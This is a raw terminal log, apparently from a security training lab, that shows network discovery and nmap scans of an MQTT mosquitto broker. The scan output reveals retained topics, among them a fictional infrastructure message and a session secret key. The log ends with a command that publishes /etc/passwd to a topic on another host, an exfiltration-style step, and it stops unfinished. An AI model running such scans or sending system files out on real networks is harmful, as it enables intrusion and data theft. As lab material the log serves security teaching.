root@attackdefense:~# ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3039: eth0@if3040: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:01:01:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.1.1.3/24 brd 10.1.1.255 scope global eth0
       valid_lft forever preferred_lft forever
3042: eth1@if3043: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:c0:1b:c8:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.27.200.2/24 brd 192.27.200.255 scope global eth1
       valid_lft forever preferred_lft forever
root@attackdefense:~# ping 192.27.200.3
PING 192.27.200.3 (192.27.200.3) 56(84) bytes of data.
64 bytes from 192.27.200.3: icmp_seq=1 ttl=64 time=0.108 ms
64 bytes from 192.27.200.3: icmp_seq=2 ttl=64 time=0.089 ms
64 bytes from 192.27.200.3: icmp_seq=3 ttl=64 time=0.086 ms
^C
--- 192.27.200.3 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 52ms
rtt min/avg/max/mdev = 0.086/0.094/0.108/0.012 ms
root@attackdefense:~# nmap -sV -p- 192.27.200.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 11:31 UTC
Nmap scan report for xtbtlhbhxoces04gs78irmc3h.temp-network_a-27-200 (192.27.200.3)
Host is up (0.000011s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE                      VERSION
1883/tcp open  mosquitto version 1.4.15
8883/tcp open  ssl/mosquitto version 1.4.15
MAC Address: 02:42:C0:1B:C8:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.02 seconds
root@attackdefense:~#
root@attackdefense:~# nmap -p1883 -sV -sC 192.27.200.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 11:37 UTC
Nmap scan report for xtbtlhbhxoces04gs78irmc3h.temp-network_a-27-200 (192.27.200.3)
Host is up (0.000054s latency).

PORT     STATE SERVICE                  VERSION
1883/tcp open  mosquitto version 1.4.15
| mqtt-subscribe:
|   Topics and their most recent payloads:
|     $SYS/broker/publish/messages/sent: 223
|     $SYS/broker/load/publish/received/15min: 4.08
|     $SYS/broker/publish/bytes/sent: 1317
|     $SYS/broker/uptime: 517 seconds
|     $SYS/broker/load/bytes/received/15min: 586.89
|     $SYS/broker/load/publish/received/1min: 9.57
|     $SYS/broker/subscriptions/count: 6
|     $SYS/broker/messages/stored: 49
|     $SYS/broker/clients/inactive: 2
|     $SYS/broker/load/bytes/received/5min: 1127.12
|     $SYS/broker/clients/total: 3
|     $SYS/broker/load/sockets/15min: 4.52
|     $SYS/broker/clients/disconnected: 2
|     $SYS/broker/load/bytes/sent/5min: 862.81
|     $SYS/broker/load/messages/received/15min: 12.92
|     industrial: Critical Infrastructure Grid of Gotham City Software Version v9.10\nStatus: Running   Security Alerts: 0
|     $SYS/broker/load/messages/sent/1min: 57.51
|     sessionkeys: Secret-key :  cdac0e50331c3d5cb1f8e63134886b9d74cdc55d -
|     $SYS/broker/version: mosquitto version 1.4.15
|     $SYS/broker/load/publish/sent/5min: 20.00
|     $SYS/broker/clients/expired: 0
|     $SYS/broker/publish/messages/received: 79
|     $SYS/broker/clients/connected: 1
|     $SYS/broker/bytes/sent: 9530
|     $SYS/broker/load/bytes/sent/15min: 471.42
|     $SYS/broker/messages/sent: 312
|     $SYS/broker/heap/current: 8414032
|     $SYS/broker/heap/maximum: 8417288
|     $SYS/broker/load/bytes/received/1min: 1405.71
|     $SYS/broker/load/connections/15min: 4.43
|     $SYS/broker/load/sockets/5min: 8.65
|     $SYS/broker/load/messages/received/1min: 31.47
|     $SYS/broker/load/sockets/1min: 11.41
|     $SYS/broker/clients/maximum: 3
|     $SYS/broker/timestamp: Sat, 07 Apr 2018 11:16:43 +0100
|     $SYS/broker/load/publish/sent/1min: 45.18
|     $SYS/broker/load/connections/1min: 11.41
|     $SYS/broker/load/publish/sent/15min: 11.00
|     $SYS/broker/load/publish/received/5min: 7.87
|     $SYS/broker/publish/messages/dropped: 0
|     $SYS/broker/load/messages/sent/5min: 28.85
|     $SYS/broker/clients/active: 1
|     $SYS/broker/retained messages/count: 49
|     $SYS/broker/bytes/received: 11400
|     $SYS/broker/load/messages/received/5min: 24.79
|     $SYS/broker/load/bytes/sent/1min: 1940.99
|     $SYS/broker/publish/bytes/received: 7216
|     $SYS/broker/load/connections/5min: 8.54
|     $SYS/broker/messages/received: 251
|_    $SYS/broker/load/messages/sent/15min: 15.58
MAC Address: 02:42:C0:1B:C8:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.26 seconds
root@attackdefense:~#
root@attackdefense:~# mosquitto_pub -t confidential -h 192.40.117.3 -f /etc/passwd
root@attackdefense:~#

######################TOBEFINSHED############################
